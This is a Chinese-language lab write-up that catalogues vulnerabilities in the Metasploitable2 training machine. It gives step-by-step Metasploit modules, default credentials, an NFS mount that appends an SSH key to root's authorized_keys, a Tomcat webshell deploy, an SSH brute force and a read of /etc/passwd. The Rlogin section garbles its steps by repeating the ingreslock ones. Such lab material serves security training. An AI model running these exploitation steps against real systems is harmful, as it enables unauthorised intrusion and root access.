Metasploitable2靶机漏洞-hanxu

Metasploitable2靶机漏洞-hanxu


2024年2月19日发(作者:)

Metasploitable2靶机漏洞

弱密码漏洞(WEAK PASSWORD)......................................................................................................... 2

SAMBA MS-RPC SHELL命令注入漏洞 ................................................................................................ 6

VSFTPD源码包后门漏洞 ................................................................................................................... 7

UNREALIRCD后门漏洞 ...................................................................................................................... 9

LINUX NFS共享目录配置漏洞......................................................................................................... 10

JAVA RMI SERVER命令执行漏洞 ..................................................................................................... 13

TOMCAT管理台默认口令漏洞 ........................................................................................................ 15

ROOT用户弱口令漏洞(SSH爆破) .............................................................................................. 18

DISTCC后门漏洞 ............................................................................................................................. 21

SAMBA SYSMLINK 默认配置目录遍历漏洞 .................................................................................... 22

PHP CGI参数注入执行漏洞 ............................................................................................................ 25

DRUBY 远程代码执行漏洞 ............................................................................................................. 26

INGRESLOCK后门漏洞 .................................................................................................................... 29

推荐精选

弱密码漏洞(Weak Password)

安全组织索引

CVE:

OSVDB:

BID:

原理

系统或者数据库的登录用户,密码简单或者和用户名相同,容易通过暴力破解手段来获取密码。

参考链接如下:

影响系统/软件

所有使用用户名/密码登录的系统/软件都有可能存在此问题。

在Metasploitable2中,系统口令、MySQL、PostgreSQL和VNC远程登录都存在弱密码漏洞

使用工具

Kali-linux

利用步骤

➢ 系统弱密码登录

1. 在kali上执行命令行telnet 7.7.5.251 23

2. login和password都输入msfadmin

3. 登录成功,进入系统推荐精选

4.

5. 相同的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/service

➢ MySQL弱密码登录

1. 在kali上执行mysql –h 7.7.5.251 –u root

2. 登录成功,进入mysql系统

3.

➢ PostgreSQL弱密码登录

1. 在kali上执行psql –h 7.7.5.251 –U postgres

2. 输入密码postgres

3. 登录成功,进入postgresql系统推荐精选

4.

➢ VNC弱密码登录

1. 在kali图形界面的终端中执行vncviewer 7.7.5.251

2. 输入密码password

3. 登录成功,进入系统

4.

推荐精选

5.

攻击样本

weak-password_telnet_ak-password_telnet_ak-password_mysql_ak-password_postgresql_ak-password_vnc_推荐精选

对应规则

友商防护能力

Samba MS-RPC Shell命令注入漏洞

安全组织索引

CVE:CVE-2007-2447

BID:BID-23972

OSVDB:OSVDB-34700

原理

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

参考链接如下:

/samba/security/

/intelligence/vulnerabilities/?id=534

影响系统/软件

Xerox WorkCentre Pro

Xerox WorkCentre

VMWare ESX Server

Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI

Trustix Secure Linux

SUSE Linux Enterprise

Sun Solaris

Slackware Linux

RedHat Enterprise

Mandriva Linux

MandrakeSoft Corporate Server

HP HP-UX

Gentoo Linux

Debian Linux

Apple Mac OS X推荐精选

使用工具

Kali,Metasploit

利用步骤

1.

2.

3.

4.

5.

在kali中执行msfconsole,启动metasploit

use exploit/multi/samba/usermap_script,选择漏洞

set RHOST 7.7.5.251,设置要攻击的机器IP

exploit,开始攻击

利用成功,执行uname –a验证

6.

攻击样本

cve_CVE-2007-2447_attack_

对应规则

友商防护能力

Vsftpd源码包后门漏洞

安全组织索引

CVE:

BID:BID-48539推荐精选

OSVDB:OSVDB-73573

原理

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

参考链接如下:

/2011/07/

/AetT9sS5

影响系统/软件

Vsftpd server v2.3.4

使用工具

Kali,Metasploit

利用步骤

1.

2.

3.

4.

5.

在kali中执行msfconsole,启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

set RHOST 7.7.5.251,设置要攻击的机器IP

exploit,开始攻击

利用成功,执行uname –a验证

6.

攻击样本

bid_BID-48539_attack_推荐精选

对应规则

友商防护能力

UnrealIRCd后门漏洞

安全组织索引

CVE:CVE-2010-2075

BID:BID-40820

OSVDB:OSVDB-65445

原理

在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

参考链接如下:

/txt/

影响系统/软件

Unreal UnrealIRCd 3.2.8.1

使用工具

Kali,Metasploit

利用步骤

1.

2.

3.

4.

5.

在kali中执行msfconsole,启动metasploit

use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 7.7.5.251,设置要攻击的机器IP

exploit,开始攻击

利用成功,执行uname –a验证推荐精选

6.

攻击样本

cve_CVE-2010-2075_attack_

对应规则

友商防护能力

Linux NFS共享目录配置漏洞

安全组织索引

CVE:无

OSVDB:无

BID:无

原理

NFS 服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/ authorized_keys可被修改,实现远程ssh无密码登陆。

影响系统/软件

所有Linux系统的NFS服务推荐精选

使用工具

Kali-linux

利用步骤

1. 在kali上执行命令行rpcinfo –p 7.7.5.251,查看nfs服务有无开启:

2. 用showmount -e 7.7.5.251查看其设置的远程共享目录列表:

3. 输入ssh-keygen生成rsa公钥:推荐精选

4. 依次输入

 mount –t nfs 7.7.5.251:/ /tmp/t00l(预先创建),把7.7.5.251的根目录挂载到/tmp/t00l/下;注:如果提示下图中错误则需要/etc/init.d/rpcbind start来启动mount

 cat /root/.ssh/id_ >> /tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;

 ssh root@7.7.5.251,实现无密码登陆

推荐精选

攻击样本

对应规则

友商防护能力

Java RMI SERVER命令执行漏洞

安全组织索引

CVE:无

OSVDB:17535

BID:无

原理

Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行

影响系统/软件

Oracle Java RMI Server

使用工具

Metasploit

利用步骤

1. Nmap –p0-65535 7.7.5.251来查看1099端口是否开启推荐精选

2. 依次输入以下命令:

 use exploit/multi/misc/java_rmi_server

 set RHOST 7.7.5.251(靶机IP)

 exploit

 shell(进入meterpreter时执行)推荐精选

然后即可获得shell了

攻击样本

java_rmi_

对应规则

友商防护能力

Tomcat管理台默认口令漏洞

安全组织索引

CVE:无

OSVDB:无

BID:无推荐精选

原理

Tomcat 管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.

影响系统/软件

Tomcat

使用工具

Nessus

JSPwebshell

利用步骤

1. 访问7.7.5.251:8081,点击tomcat manager,输入tomcat/tomcat,即可进入管理台

2. 在自己机器上准备好JSP webshell(),通过jar –cvf 来打包成

3. 通过tomcat管理台deploy刚才打包的推荐精选

4. 打包成功可以看到应用目录生成(/liuz)

5. 访问7.7.5.251/liuz/得到webshell

推荐精选

攻击样本

对应规则

友商防护能力

Root用户弱口令漏洞(SSH爆破)

安全组织索引

CVE:无

OSVDB:无

BID:无

原理

靶机root用户存在弱口令漏洞,在使用指南里并没有指出。.推荐精选

影响系统/软件

Linux

使用工具

metasploit

利用步骤

1. 输入nmap –sV –O 7.7.5.251,查看SSH端口是否开启:

2. 打开metasploit framework依次输入:

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 7.7.5.251

set USERNAME root

set PASS_FILE /tmp/r00t/(字典文件,需要预先生成)

set THREADS 50

run推荐精选

root口令爆破成功 ,口令为root

3. ssh root@7.7.5.251 成功登陆:

攻击样本

root_ssh_推荐精选

对应规则

友商防护能力

Distcc后门漏洞

安全组织索引

CVE:CVE-2004-2687

BID:

OSVDB:OSVDB-13378

原理

Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。

参考链接如下:

/cgi-bin/?name=2004-2687

影响系统/软件

distcc 2.x

使用工具

Kali,Metasploit

利用步骤

1.

2.

3.

4.

5.

在kali中执行msfconsole,启动metasploit

msf > use exploit/unix/misc/distcc_exec,选择漏洞

set RHOST 7.7.5.251,设置要攻击的机器IP

exploit,开始攻击

利用成功,执行id查看权限,uname –a验证服务器信息推荐精选

6.

攻击样本

distcc_

对应规则

友商防护能力

Samba sysmlink 默认配置目录遍历漏洞

安全组织索引

CVE:CVE- 2010-0926

BID:33598

OSVDB:OSVDB-62145推荐精选

原理

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。

参考链接如下:

/

影响系统/软件

before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3

使用工具

Kali,Metasploit

利用步骤

1.

2.

3.

4.

5.

6.

在kali中执行msfconsole,启动metasploit

use auxiliary/admin/smb/samba_symlink_traversal,选择漏洞

set RHOST 7.7.5.251,设置要攻击的机器IP

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp 设置SAM可写文件

exploit,开始攻击

root@yd0str:~# smbclient //7.7.5.251/tmp 在新窗口下执行smbclient命令打开上面生成的共享目录

7. smb: > cd rootfs 进入rootfs目录

8. smb: rootfs> ls 执行ls命令列出目录,

9. smb: rootfs> more /etc/passwd 列出密码文件,利用成功推荐精选

10.

11.

攻击样本

samba-symlink_CVE- 推荐精选

对应规则

友商防护能力

PHP CGI参数注入执行漏洞

安全组织索引

CVE:CVE- 2012-1823

BID:

OSVDB:OSVDB-81633

原理

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

参考链接如下:

/cve/2012-1823/

/81633

/93979

/exploits/25986

/2012/05/php-cgi-advisory-cve-2012-1823/

/en/116241

影响系统/软件

before 5.3.12 and 5.4.x before 5.4.2

使用工具

Kali,Metasploit

利用步骤

1. 在kali中执行msfconsole,启动metasploit

2. msf > use exploit/multi/http/php_cgi_arg_injection,选择漏洞

3. set RHOST 7.7.5.251,设置要攻击的机器IP推荐精选

4. exploit,开始攻击

5. meterpreter > ls 获得meterpreter,可执行ls列出目录确认承认

6.

攻击样本

cgi_CVE-

对应规则

友商防护能力

Druby 远程代码执行漏洞

安全组织索引

CVE:CVE- 2013-0156(类似)

BID:

OSVDB:推荐精选

原理

Druby配置不当,被滥用执行命令(Distributed Ruby or DRb allows Ruby programs to

communicate with each other on the same machine or over a network. DRb uses remote

method invocation (RMI) to pass commands and data between processes)

参考链接如下:

/db/modules/exploit/linux/misc/drb_remote_codeexec

/stdlib-1.9.3/libdoc/drb/rdoc/

/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156

影响系统/软件

Ruby 1.8

使用工具

Kali,Metasploit

利用步骤

1. root@yd0str:~# nmap -p0-65535 -sS -sV 7.7.5.251,NMAP扫描端口及端口应用

(或者amap -bqv 7.7.5.251 8787)

2. 在kali中执行msfconsole,启动metasploit

3. 发现8787druby端口

4. msf > search drb 搜索dbr相关漏洞

5. msf > use exploit/linux/misc/drb_remote_codeexec 使用漏洞

6. set URI druby:7.7.5.255:8787,设置要攻击的机器的druby链接

7. exploit,开始攻击

8. 输入id, uname -a确认推荐精选

9.

10.

攻击样本

druby_CVE- 推荐精选

对应规则

友商防护能力

Ingreslock后门漏洞

安全组织索引

CVE:

BID:

OSVDB:

原理

Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限

参考链接如下:

/2011/07/

影响系统/软件

使用工具

Kali

利用步骤

1. 在kali中执行命令行 telnet 7.7.5.251 1524

2. 获得root权限

3. 执行uname –a验证

4.

推荐精选

攻击样本

对应规则

友商防护能力

推荐精选

Rlogin后门漏洞

安全组织索引

CVE:

BID:

OSVDB:

原理

TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts + +)。要利用这个配置,确保rsh客户端已经安装(在linux操作系统上安装例如Open SSH),然后以root权限运行下列命令,如果被提示需要一个SSH秘钥,这表示rsh客户端没有安装,ubuntu一般默认使用SSH(Debian GNU/Linux也是如此)。

影响系统/软件

Linux

使用工具

Kali

利用步骤

5. 在kali中执行命令行 telnet 7.7.5.251 1524

6. 获得root权限

7. 执行uname –a验证

8.

攻击样本

推荐精选

对应规则

友商防护能力

(注:可编辑下载,若有不当之处,请指正,谢谢!)

推荐精选


发布者:admin,转转请注明出处:http://www.yc00.com/news/1708328844a1551954.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信